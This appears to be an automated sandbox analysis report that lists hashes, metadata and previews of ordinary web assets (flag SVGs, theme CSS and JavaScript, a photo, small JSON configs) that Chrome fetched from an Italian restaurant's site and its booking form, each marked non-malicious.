                                                                                                                                              Preview:<!doctype html>.<html lang="en" translate="no">.<head>. <meta charset="utf-8">. <meta name='viewport'. content='width=device-width, initial-scale=1.0, maximum-scale=1.0,. user-scalable=1' >. <title>Servizio offerto da pienissimo.pro</title>. <meta name="google" content="notranslate">. <meta name="robots" content="noindex,nofollow">. <base href="/">. <link rel="icon" type="image/x-icon" href="favicon.ico">. datapicker boostrap -->. <link rel="stylesheet" href="https://unpkg.com/ngx-bootstrap/datepicker/bs-datepicker.css">.. fb e google analytics -->. <script>. !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?. n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;. n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;. t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,. document,'script','https://connect.facebook.net/en_US/fbevents.js');. (
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8363
                                                                                                                                              Entropy (8bit):4.546410233017379
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:FpbeuCTjyafyW0RB3kZ4Kyudxk2KDGWmSxMnHB+O/se:Fp6VXqWeB+4nqxk2KDOh
                                                                                                                                              MD5:A36B3D87508AD8F6A6BC6787BBE808ED
                                                                                                                                              SHA1:70F3E265EC75B35C1B1911171EB38A519974D2E4
                                                                                                                                              SHA-256:A24D5BB8F031434DCBB692FA6D62C2AAD3974D6E87ACAE884244D182D5B384C8
                                                                                                                                              SHA-512:62A23D4FAFFCAE8469C68C6A5B4608BA9D24603C0FAE96A591BDB09AEA23CF179D909296C0FB4F84B358E688249C4DAE5FD0F257D633066B94A8E4A45E98D0DE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="flag-icons-pt" viewBox="0 0 640 480">. <path fill="red" d="M256 0h384v480H256z"/>. <path fill="#060" d="M0 0h256v480H0z"/>. <g fill="#ff0" fill-rule="evenodd" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width=".6">. <path d="M339.5 306.2c-32.3-1-180-93.2-181-108l8.1-13.5c14.7 21.3 165.7 111 180.6 107.8l-7.7 13.7"/>. <path d="M164.9 182.8c-2.9 7.8 38.6 33.4 88.4 63.8 49.9 30.3 92.9 49 96 46.4l1.5-2.8c-.6 1-2 1.3-4.3.6-13.5-3.9-48.6-20-92.1-46.4-43.6-26.4-81.4-50.7-87.3-61a6.3 6.3 0 0 1-.6-3.1h-.2l-1.2 2.2-.2.3zm175.3 123.8c-.5 1-1.6 1-3.5.8-12-1.3-48.6-19.1-91.9-45-50.4-30.2-92-57.6-87.4-64.8l1.2-2.2.2.1c-4 12.2 82.1 61.4 87.2 64.6 49.8 30.8 91.8 48.9 95.5 44.2l-1.3 2.3z"/>. <path d="M256.2 207.2c32.2-.3 72-4.4 95-13.6l-5-8c-13.5 7.5-53.5 12.5-90.3 13.2-43.4-.4-74.1-4.5-89.5-14.8l-4.6 8.6c28.2 12 57.2 14.5 94.4 14.6"/>. <path d="M352.5 193.8c-.8 1.3-15.8 6.4-37.8
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3870938
                                                                                                                                              Entropy (8bit):5.430304312089216
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:Fl/TwBsh62MXV8v9JbM8XngcgZ5wDh6Jsha0JBotQ3QqxxrClUauh8CP:X/Two3QqxxT
                                                                                                                                              MD5:157BABAF461864D2C0F3C11D19D94AD3
                                                                                                                                              SHA1:22AA3C79841BDC6CFA6E4CC503DD14C18A8DC964
                                                                                                                                              SHA-256:51A6E76BC6227CDA4BDA4E97E41E579C3DC6E911689991B0A23D8280720D61BC
                                                                                                                                              SHA-512:A51EBE9C8730AEB0EAA8A037A8C3C7B26546C8BD988BCA9886CB3C3763BE252DFDF306D36F86CB4D8415CABD18CC0C2A4AD09FE471A6CC1DCEFBC210DF15FBCA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/main-es2015.d19a2a9abbf7534a8995.js
                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[1],{0:function(e,o,i){e.exports=i("zUnb")},"1IWC":function(e,o,i){var n,a,t;!function(c){if("object"==typeof e.exports){var r=c(0,o);void 0!==r&&(e.exports=r)}else a=[i,o],void 0===(t="function"==typeof(n=c)?n.apply(o,a):n)||(e.exports=t)}((function(e,o){"use strict";Object.defineProperty(o,"__esModule",{value:!0});var i=void 0;o.default=["it",[["m.","p."],["AM","PM"],i],i,[["D","L","M","M","G","V","S"],["dom","lun","mar","mer","gio","ven","sab"],["domenica","luned\xec","marted\xec","mercoled\xec","gioved\xec","venerd\xec","sabato"],["dom","lun","mar","mer","gio","ven","sab"]],i,[["G","F","M","A","M","G","L","A","S","O","N","D"],["gen","feb","mar","apr","mag","giu","lug","ago","set","ott","nov","dic"],["gennaio","febbraio","marzo","aprile","maggio","giugno","luglio","agosto","settembre","ottobre","novembre","dicembre"]],i,[["aC","dC"],["a.C.","d.C."],["avanti Cristo","dopo Cristo"]],1,[6,0],["dd/MM/yy","d MMM y","d MMMM y","EEEE d MM
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8056
                                                                                                                                              Entropy (8bit):4.773168794594566
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:MPVYtfFmJjA14X5aIeivPWbOMF30PvuT/O9qlGXVW15fBFhAtfSY+IQBxF:SjA5YvebOC3ZWpS7h2mJ
                                                                                                                                              MD5:D367FB7182DA13691672DC5FB4062EE2
                                                                                                                                              SHA1:364247F8C2511AA0B801C3BA38FF259C3AB658BE
                                                                                                                                              SHA-256:E67830A7AA3816D2D81D3910B57E724BF3E5C72362690764E7F380F1EF2CFF44
                                                                                                                                              SHA-512:B6EC0AF265E7EEC62FDA4E7819D4E7878D9FB46416BB9B28FAFE1E3D6B834FC4C0B52AACBA415B0331A848A45C999C039C2363E5957407D662024319FEA55825
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Masonry.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.avia_masonry = function(options)..{...//return if we didnt find anything...if(!this.length) return this;......var the_body = $('body'),....the_win. = $(window),....isMobile = $.avia_utilities.isMobile,....loading = false,....methods = {...........masonry_filter: function()....{.....var current..= $(this),......linktext.= current.html(),.... ..selector.= current.data('filter'),.... ..masonry .= current.parents('.av-masonry:eq(0)'),.... ..container .= masonry.find('.av-masonry-container:eq(0)'),.... ..links..= masonry.find('.av-masonry-sort a'),.... ..activeCat.= masonry.find('.av-current-sort-title');............links.removeClass('active_sort');......current.addClass('active_sort');......container.attr('id', 'masonry_id_'+selector);............if
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):4.769147194204528
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YITi5idYhzOJQf0CDMe2JTAHY/2bQcrBYOmVqaf5EgJZ54wLzjs0:YIUi6CesCTuiYu2OepEgJZ54G
                                                                                                                                              MD5:0459493E34368F890B0D2F1391A5679D
                                                                                                                                              SHA1:395D0371197A70C2C1C0A3BB61EE2B5388BD4006
                                                                                                                                              SHA-256:6D9644BE924CD574A9AEB38975E5F292544309B2DDB32E3B6E179A045544E12B
                                                                                                                                              SHA-512:9AEEF6B2CB09EC8E5EB51EFBE5B3DD6EFD5DC16BC85940E2DA70BCAF7F79BE14563F871ACFB4248A5EC716F43C1DC7C219189967235AE0889862398E0940B50E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"lingua":"Italiano","nome_locale":"CIPASSO Roma","telefono":"3282045550","cellulare":"","prefisso":"+ 39","valuta":"eur","country":"IT","location":{"lat":41.9020219,"lng":12.4758908},"pixel_facebook":null,"pixel_google_analytics":null,"pixel_google_tag_manager":null,"pixel_tiktok":null,"durata":"90"}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4724
                                                                                                                                              Entropy (8bit):4.72551908428837
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:yrj3WJ7joCcSNg/g0GfN5gUC7g1jgnNpn5jgUGhqhxBxty0ufhT110FFff5kAT:gGJ7joCcSNg/gbgUmg1jgnNp1gUGhqhF
                                                                                                                                              MD5:7276681E0E7D64FD84BA4E7B36D67C36
                                                                                                                                              SHA1:A6AF31FE2B8DC239AD51233F1FBEDBB26B5F01E6
                                                                                                                                              SHA-256:91580DB5F8A95EAF1D2BBB373AB97D74D1EAA6547D849D3ACEC12056F4496D9D
                                                                                                                                              SHA-512:8389891FCD9B8EE8C805DBA00794F8B6078E8146185ECC972AF2BC936AD56A173EB7840FEB94289091F0B8EC7F5A5D1CA789BE8BCB458AAF3D17DB8E704D7A18
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Toggle shortcode javascript.// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....$.fn.avia_sc_toggle = function(options)..{...var defaults =...{....single: '.single_toggle',....heading: '.toggler',....content: '.toggle_wrap',....sortContainer:'.taglist'...};.....var win = $(window),....options = $.extend(defaults, options);.....return this.each(function()...{....var container .= $(this).addClass('enable_toggles'),.....toggles..= $(options.single, container),.....heading .= $(options.heading, container),.....activeStyle = $(container).attr('data-currentstyle'),.....allContent .= $(options.content, container),.....sortLinks.= $(options.sortContainer + " a", container);......heading.each(function(i)....{.....var thisheading = $(this),......content = thisheading.next(options.content, container),......headingStyle = th
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21
                                                                                                                                              Entropy (8bit):3.594465636961452
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                                                                                                              MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                                                                                              SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                                                                                              SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                                                                                              SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"ip":"8.46.123.189"}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):91815
                                                                                                                                              Entropy (8bit):4.491478757594995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:3xMcdm6KY4kmAq6RPewyYd491pPiv1iuLVg6wuU9GW/b/qOuD+1TcKszCWsXiKiB:Wcdm6KY4ky10d4vpPiv1P
                                                                                                                                              MD5:91221AEBA452AEB57C55826C70920835
                                                                                                                                              SHA1:A9556AB0E13A9FB6F2BED11251C35044864A0B52
                                                                                                                                              SHA-256:6FE80291CD9BE7F06D9F205081C3A5264DA531B49E40DDBE63BDA08A83C1AFD9
                                                                                                                                              SHA-512:C3888A7C6E7C9F985F4801738DA1B1B405A7D9A9A95906C9B17926C627F7C100C191D684ECE752906E72406574D92E3E42D0AFFD2EFABDAAAFC18BF1AB6B8E42
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-es" viewBox="0 0 640 480">. <path fill="#AA151B" d="M0 0h640v480H0z"/>. <path fill="#F1BF00" d="M0 120h640v240H0z"/>. <path fill="#ad1519" d="m127.3 213.3-.8-.1-1-1-.7-.4-.6-.8s-.7-1.1-.4-2c.3-.9.9-1.2 1.4-1.5a12 12 0 0 1 1.5-.5l1-.4 1.3-.3.5-.3c.2 0 .7 0 1-.2l1-.2 1.6.1h4.8c.4 0 1.2.3 1.4.4a35 35 0 0 0 2 .7c.5.1 1.6.3 2.2.6.5.3.9.7 1.1 1l.5 1v1.1l-.5.8-.6 1-.8.6s-.5.5-1 .4c-.4 0-4.8-.8-7.6-.8s-7.3.9-7.3.9"/>. <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="m127.3 213.3-.8-.1-1-1-.7-.4-.6-.8s-.7-1.1-.4-2c.3-.9.9-1.2 1.4-1.5a12 12 0 0 1 1.5-.5l1-.4 1.3-.3.5-.3c.2 0 .7 0 1-.2l1-.2 1.6.1h4.8c.4 0 1.2.3 1.4.4a35 35 0 0 0 2 .7c.5.1 1.6.3 2.2.6.5.3.9.7 1.1 1l.5 1v1.1l-.5.8-.6 1-.8.6s-.5.5-1 .4c-.4 0-4.8-.8-7.6-.8s-7.3.9-7.3.9z"/>. <path fill="#c8b100" d="M133.3 207c0-1.3.6-2.3 1.3-2.3.8 0 1.4 1 1.4 2.4 0 1.3-.6 2.4-1.4 2.4s-1.3-1.1-1.3-2.5"/>. <path fill="none" stroke="#000" stroke-width=".3" d="M133.3
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4444
                                                                                                                                              Entropy (8bit):5.027853236722188
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:E10/sgONS8Rl61z6U8GdaoHLEL2g1xSMRSQE:E10/7p8Rgx6UVdg1sMs
                                                                                                                                              MD5:D5813D827D76090F9AE57CEB9EE0C237
                                                                                                                                              SHA1:3914EBC87C2B4D514865B8D2B5A4CBFED056329C
                                                                                                                                              SHA-256:EBF58BE00925B63196DF30DB7702D649C33078A859023695351B629559CC58D0
                                                                                                                                              SHA-512:19C1A250F661A08C8DA78A5877A641D7E45D86A60C789333C661AD542CC7701F6A7FA7B8D26E3A91F759C4EF62966041DB0EF87F793678491C2DC535776E0DB0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Image with Hotspots.====================================================================================================================================================== */....av-hotspot-container {position: relative; display: table; margin: 0 auto; clear: both; table-layout:fixed}..av-hotspot-container-inner-cell{display: table-cell;}..av-fullwidth-hotspots .av-hotspot-container-inner-cell{width:100%;display:block;}..av-hotspot-container-inner-wrap img{width:100%; display: block;}...av-hotspot-container .av-image-hotspot{height:18px; width:18px; font-size: 10px; line-height: 18px; text-align: center; position: absolute; z-index: 1; margin:-9px 0 0 -9px; }..av-hotspot-container .av-image-hotspot_inner{ display:block; border-radius: 100px; position: absolute; height:100%; width:100%; background: #fff; color: #888; z-index: 2; cursor
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=15, height=2667, bps=194, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 6D Mark II, orientation=upper-left, width=4000], baseline, precision 8, 5727x1899, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1101494
                                                                                                                                              Entropy (8bit):7.9387573423984055
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:nJuzPp6aib0YJIAADJrU4KoNRSSTLLbhaaIIEzaG:nJuBiPJHGKO7nnI1
                                                                                                                                              MD5:88DE45CAC853143B9E28DB80D4C8E8FA
                                                                                                                                              SHA1:88DD4DD8F801E1800E0A7A94A7BBC4C7FE8F7149
                                                                                                                                              SHA-256:55D363AB641C65F81109115A8DDACE66EC40F1A066581605DD31B970AA6E49A9
                                                                                                                                              SHA-512:29F615C9164F11003D1937F3E230D5B6489FB695B994E54D04B9C20A4F5211DE543595FED4398456E184793184C591CB63C9A6D75FFCAD90CB7A2800A7DAB758
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......Exif..II*...........................k...................................................................................................(...........1...........2...........;.......&...i.......8.............Canon.Canon EOS 6D Mark II...-..'....-..'..Adobe Photoshop CC (Macintosh).2019:09:11 12:13:45.Mariano Romani.... ........................."...........'...........0...........2...................0230....................................................................................................................00..........00......................_...........k.......................&...............................................................1...........2.......;...4.......[...5.......s...............G.......2019:06:25 10:28:57.2019:06:25 10:28:57..Qr.@B..VLV.@B..................&........Ud......Ud.....053051007305.........F.......................EF24-70mm f/2.8L II USM.6075004335.........................................(.......................................H.......H.....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1385
                                                                                                                                              Entropy (8bit):4.534810971493058
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:sYUGQmS0b3Pr5pnrOIYOILHieROIpcZExvKI7Gf8aMoE/DMSaV:5UG/dbr5prOIYOIbH0Ipc2xCI7G8aNEI
                                                                                                                                              MD5:AABBB98DE4126CF0A95214A8DFCC8E06
                                                                                                                                              SHA1:21F81926712D643614DC73585BDDCEB8CD88C5E0
                                                                                                                                              SHA-256:98125B0A0447BE74F87CD12F91983A5A0878DC247DA92ECF3C544D119D3DCF1A
                                                                                                                                              SHA-512:5C265BB119B2D4F478642DC0B19296AA87FC1FC9349B93A6F43EB1A5CBB716F4A01B302A4BD167831B9F98AE127613A138FE316680A581A4F85283E62F3D46E9
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.AVIA PLAYER .====================================================================================================================================================== */../*playlist shortcode*/...av-player.av-player-container .wp-playlist{.margin:0;.}...av-player.av-player-container .av-player-cover-container .av-player-cover img{..display: block;..max-width: 100%;. max-height: 100%;.}...avia-playlist-hide-cover .wp-playlist-current-item{..height:auto;.}..#top .avia-playlist-custom-background-color .wp-playlist{ background: transparent; }.#top .avia-playlist-custom-font-color *{ color:inherit; }.#top .avia-playlist-custom-font-color .wp-playlist-item > *{ opacity: 0.8; }.#top .avia-playlist-custom-font-color .wp-playlist-item.wp-playlist-playing > *{ opacity: 1; }..#top .avia-playlist-custom-border-color .wp-playlist{ border: none; }.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):41549
                                                                                                                                              Entropy (8bit):3.891076478580473
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:JIk9w1DFY7Z1kB1gkRWyh+XcmVDPCrJ/O8H1IAWWkxf:JJwC3E1gkRWyhUc0DKN/TH1IA/kZ
                                                                                                                                              MD5:9B7FD1F4BBDBE44A159903D73AC3A7E1
                                                                                                                                              SHA1:AC40F40CF5B6939B42FC505977904CDA0F94BA57
                                                                                                                                              SHA-256:C853A9F189F3869E21307B1DBBFCE7376289D7EECBDEC3CD67BF295A03184C16
                                                                                                                                              SHA-512:AA9678998647837C91DC4E9B30779FE04164CC14B39B3C5C3CB961458C39FACC7D90EF36E0F8A1355D37BBB7883180342C95790DD1E627AD64536B028EE37E73
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/hr.89b8c8af46eef412f1cd.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="flag-icons-hr" viewBox="0 0 640 480">. <path fill="#171796" d="M0 0h640v480H0z"/>. <path fill="#fff" d="M0 0h640v320H0z"/>. <path fill="red" d="M0 0h640v160H0zm320 364.1c51.3 0 93.3-42 93.3-93.3V160H226.7v110.8c0 51.4 42 93.4 93.3 93.4z"/>. <path fill="#fff" d="M320 362.6a91.8 91.8 0 0 0 91.6-91.5V161.8H228.5V271a91.8 91.8 0 0 0 91.5 91.5z"/>. <g fill="red">. <path d="M267.1 165.2H232v38.7h35.2zm0 77.4h35.3v-38.7H267zM232 270.9c0 3.5.2 7 .6 10.4h34.6v-38.7H232v28.3zm105.7-28.3h-35.2v38.7h35.2zm0 77.4h35.2v-38.7h-35.2zm35.2 21.2A89.2 89.2 0 0 0 393 320h-20v21.2zM267.1 320h35.3v-38.7H267zm-20.1 0a89.2 89.2 0 0 0 20.1 21.2V320H247zm79.1 38.7c4-.3 7.7-.8 11.5-1.6V320h-35.2v37.1a87 87 0 0 0 11.4 1.6c4.1.3 8.2.2 12.3 0z"/>. <path d="M407.4 281.3c.4-3.4.6-6.9.6-10.4v-28.3h-35.2v38.7h34.6zm-69.8-38.7h35.2v-38.7h-35.2zm0-77.4h-35.2v38.7h35.2zm70.4 38.7v-38.7h-35.2v38.7z"/>. </g>. <path fill="#fff
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1478
                                                                                                                                              Entropy (8bit):4.6100727546381295
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:rcT7tMTbeWTTLRT2TzAPTWDpTXPOTN2TLvFTLpHL7tbey2GETNTrTY2SwTB:DT6TrkivlSJGS
                                                                                                                                              MD5:B9D6D602C979AFAC668127BE7FADD419
                                                                                                                                              SHA1:3400EE1C8A3F0A6D0ACABF7A642A4219C6D4DD10
                                                                                                                                              SHA-256:BDE8A94F49386D7BAB81BDFC1BCFE06028D23120903FE8CC419D208273E59FA4
                                                                                                                                              SHA-512:C57DB2CE7BF278E9254F52190C2B7FA76A660E8A6E95AFA7A4322504C15EB28ABF493CF6CA53A6C355E5784CBB4B503A8E4F0EE268EC971B393F8146B1D63CF2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Fullwidth Button.====================================================================================================================================================== */...#top .avia-button-fullwidth{ width: 100%; padding:20px; font-size: 1.5em; margin:0;border:none; position: relative; display:block;}.#top .avia-button-fullwidth .avia-button-fullwidth{font-size: 1em;}.#top .avia-button-fullwidth .av-button-description{font-size: 0.8em; position: relative; z-index: 3; opacity: 0.7;}.#top .avia-button-fullwidth .av-button-description-above p:first-child{margin-top:0;}.#top .avia-button-fullwidth .av-button-description-below p:last-child {margin-bottom:0;}....#top .avia-button-fullwidth:hover{opacity: 1;}.#top .avia-button-fullwidth .avia_button_icon, #top .avia-button-fullwidth .avia_iconbox_title{ position: relative; z-index: 3; -web
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3691
                                                                                                                                              Entropy (8bit):4.92121733010683
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Xdri1XeJX1gnye5qsMWTyv1l8JDcC4CouJCpd5JxJrL1y1tw:41XeJX1gnye5s/tl8QQWbVL1QC
                                                                                                                                              MD5:913F2499B977D922FE31344222AF4757
                                                                                                                                              SHA1:5AEF51CF072B545F949A254984083B674260E825
                                                                                                                                              SHA-256:ECDC3E1733B4465431016227C1C31CD75BB931A284B9728A4478217E8A57EEE0
                                                                                                                                              SHA-512:59D071A7B6838747579351EF899A9275ADBB266754092D466D8331DB2FF8D349CE72880BAE8F6456B65105E7DEBC156FA8C3B59D6596F0BCF4EF7228ABBD0EBB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Tabs.====================================================================================================================================================== */.#top .tabcontainer{.background: transparent;.}...tabcontainer{.margin: 30px 0;.position: relative;.width:100%;.clear: both;.overflow: hidden;.background: transparent;.}...tab_titles{.position: relative;.width:100%;.clear: both;.float:left;.z-index: 5;.}...widget .tabcontainer{.margin-top:0px;.}....js_active .tab_content{.visibility: hidden;.clear: both;.padding: 10px 19px;.overflow:auto;.position: absolute;.top:0;.z-index: 0;.left:120%;.width:100%;.}...js_active .tab{.cursor:pointer;.margin:0 -1px 0 0;.display: block;.float: left;.z-index: 2;.position: relative;.padding:12px 16px;.top:1px;.font-size: 0.8em;.-webkit-touch-callout: none;.-webkit-user-select: none;.-khtml-user-sele
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (20087)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):20216
                                                                                                                                              Entropy (8bit):5.338721920008614
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:lPhVPXQ2G2XAQyqVxRQ5giCCMLtA15h5/F6l8aZwHwztLCpmst:lPBIt8I5h5t1qkOLCMst
                                                                                                                                              MD5:BA6CF724C8BB1CF5B084E79FF230626E
                                                                                                                                              SHA1:F455C5F153F872E52265F87A644FF89FE14A6FB6
                                                                                                                                              SHA-256:3FDDC6D28ABA3C13D64CFD4847C333FF48C71D4A5A58BD1A0494CA6AE8AC1BB4
                                                                                                                                              SHA-512:22C361E44DDE632DEDAFF2625F6631E2FB02BA3B6487097B48BAA09F02CD81FD381EBB7D053F525E52E56655B1F8E2B89DDCC0A002E1B0C35C0A6920823641D7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/aviapopup/jquery.magnific-popup.min.js?ver=4.5
                                                                                                                                              Preview:/*! Magnific Popup - v1.1.0 - 2016-02-20.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2016 Dmitry Semenov; */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=c),
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):13208
                                                                                                                                              Entropy (8bit):4.250198143484081
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:EMXzMZxBriAIqBh7A0XmPU2G+3ml7boWqXSUfvlhdUaBYmXQ1i:dqxJxIqBC0WPU2G+Wl78h7vfdemUi
                                                                                                                                              MD5:791B7ECF968525ABE7A4E9302B5024C0
                                                                                                                                              SHA1:6B8C060F1A70733BBF4CC9BDF22324F8C37E96AB
                                                                                                                                              SHA-256:3A7DC7BFF26B0FB5829B872E30A348933BBAB87CDF920DB9760A08913055F97B
                                                                                                                                              SHA-512:1CE5C1B7048DC47D8666562654EAC8BD23F188738D679AB8C06A420AE07491B5C9D18C69556EE89C47C16F3274B6F7E4CBE95592913674BE755F86585275E449
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/assets/js/main.js?_=1735922053694
